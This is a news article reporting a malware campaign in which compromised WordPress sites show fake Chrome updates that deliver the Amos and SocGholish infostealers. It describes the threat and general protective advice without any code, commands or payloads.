Cybercriminals are taking advantage of outdated WordPress installations and plugins to compromise numerous websites, aiming to deceive visitors into downloading malware, according to cybersecurity researchers.

Understanding the Attack

This active hacking effort, identified by security firm c/side, seeks to propagate malware that can steal credentials and personal information from both Windows and Mac users. Some of the compromised sites are widely visited, putting a large number of users at risk.

The attack employs a broad-scope strategy, attempting to infect anyone visiting these sites rather than focusing on specific individuals or groups. Once a compromised WordPress site is accessed, it briefly displays a counterfeit Chrome browser update, tricking users into downloading malicious files disguised as updates.

Malware Details

The malware involved includes Amos and SocGholish, which attack Mac and Windows systems, respectively. Amos, identified by SentinelOne in May 2023, is an infostealer targeting macOS. It operates under a malware-as-a-service model, sold to attackers who deploy it to pilfer sensitive data such as passwords, cryptocurrency wallets, and other personal information.

Mac security expert Patrick Wardle has pointed out that despite amassing detailed victim data, this malware requires users to manually bypass Apple's security features to execute the installation.

Detection and Response

c/side reports discovering over 10,000 sites affected by this campaign, using techniques like internet crawling and reverse DNS lookups to identify domains hosting malicious scripts. While tech inquiries couldn't confirm these figures, at least one compromised site still showed harmful content during their investigation.

Automattic, the company behind WordPress, has been notified of the malicious domains, although there's been no public response from the firm regarding these findings.

Security Measures

Users are urged to ensure browser updates via trusted sources and to install only verified applications. Security awareness is crucial, as malware exploiting password vulnerabilities can lead to significant breaches, such as the past events involving corporate data theft.

Conclusion

This cybersecurity incident underscores the continuous threat of exploiting WordPress vulnerabilities to deliver malicious software. It highlights the importance of maintaining an updated digital infrastructure and being vigilant about software authenticity.

The link has been copied!